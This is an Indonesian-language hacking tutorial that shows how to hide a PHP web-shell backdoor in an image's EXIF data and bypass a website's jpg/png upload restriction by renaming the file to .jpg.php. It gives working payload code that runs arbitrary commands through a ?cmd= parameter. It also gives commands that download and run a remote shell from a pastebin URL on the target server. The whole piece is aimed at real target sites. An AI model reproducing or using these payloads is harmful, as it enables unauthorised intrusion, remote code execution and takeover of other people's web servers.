Seperti yang kalian ketahui backdoor ialah jalan pintas dalam keamanan sistem yang digunakan oleh para peretas untuk mengakses masuk ke dalam suatu system yang memiliki celah keamanan. Dan kali ini saya akan berbagi tutorial cara menyisipkan shell backdoor ke dalam gambar.

Mungkin ada beberapa dari kalian yang pernah masuk kedalam sebuah sistem dashboard pada suatu website, akan tetapi pada saat ingin mencoba mengupload shell/backdoor tidak bisa dikarenakan file yang diperbolehkan hanyalah berekstensi jpg/png dan biar pun ditamper pun tetap tidak akan bisa. Berikut tutorial mengatasinya dengan menyisipkan backdoor PHP ke dalam sebuah gambar.

Bahan-bahan yang dibutuhkan (Windows) :

1. Gambar yang ingin digunakan
2. Software Exif Editor (klik disini)
3. Code Backdoor PHP :

<style>body{font-size: 0;}h1{font-size:
12px}</style><h1><?php
if(isset($_REQUEST['cmd'])){system($_REQUEST['cmd']);}else{echo '<img
src="LINK GAMBAR" border=0>';}__halt_compiler();?></h1>

Tips : LINK GAMBAR isilah dengan url gambar kalian contohnya seperti dibawah ini.

<style>body{font-size: 0;}h1{font-size:
12px}</style><h1><?php
if(isset($_REQUEST['cmd'])){system($_REQUEST['cmd']);}else{echo '<img
src="https://imgbb.com/fff.jpg"
border=0>';}__halt_compiler();?></h1>

Baca juga : Deface DNS Afraid Take Over with Github

Cara Menyisipkan Shell Backdoor PHP ke Dalam Gambar :

1. Kalian install terlebih dahulu Exif Editor. Jika sudah, bukalah aplikasi tersebut.

2. Kemudian klik Open lalu pilihlah gambar yang ingin disisipkan Backdoor PHP.

3. Klik icon plus (+) sesuai petunjuk gambar dibawah ini.

4. Jika ada notifikasi seperti gambar dibawah ini, kalian klik Yes.

5. Setelah itu isilah Type sesuai gambar dibawah ini dan jangan lupa isi Value dengan keinginan kalian, lalu klik Add.

6. Kemudian lakukan klik 1 Pending Change.

7. Setelah itu klik Edit Modification.

8. Lalu Masukan kode PHP yang ada di atas tadi kedalam New Value lalu kemudian klik Save.

9. Klik Commit change.

10. Setelah itu pilihlah tempat penyimpanan gambar yang sudah di inject tadi dan klik Save.

11. Ubahlah extensi gambar tadi menjadi namagambar.jpg.php dan cobalah cek menggunakan notepad++ apakah sudah terinject.

12. Dan ternyata sudah terinject / tersisipkan.

Kemudian kalian coba upload ke website target dan ketika sudah berhasil mengupload lalu akses lah gambar tadi dan coba masukan ?cmd= pada belakang nama gambar contohnya target.com/mastahcyber.jpg.php?cmd= lalu masukan perintah berikut uname -a contohnya ?cmd=uname -a dan jika muncul keterangan server target berarti berhasil seperti gambar dibawah ini.

13. Selanjutnya cobalah upload shell menggunakan perintah dibawah ini.

echo '<?php eval("?>".file_get_contents("https://pastebin.com/raw/en5tp4kX"));?>' > shell.php

Bisa juga :

wget https://pastebin.com/raw/en5tp4kX -O shell.php

Tips : Yang saya berikan warna biru kamu bisa ubah dengan shell yang kamu inginkan dan yang warna merah itu untuk nama shell nya dan kamu juga bisa mengubahnya.

14. Cobalah kamu akses shell yang sudah kamu upload tadi sesuai nama shell dan letak dir. contohnya target.com/shell.php.

15. Dan shell pun telah terupload dan kita berhasil membypassnya, nah mudah kan.

Sekian dulu tutorial dari saya, sampai jumpa di tutorial berikutnya dan nantikanlah tutorial menarik lainnya. jangan lupa share.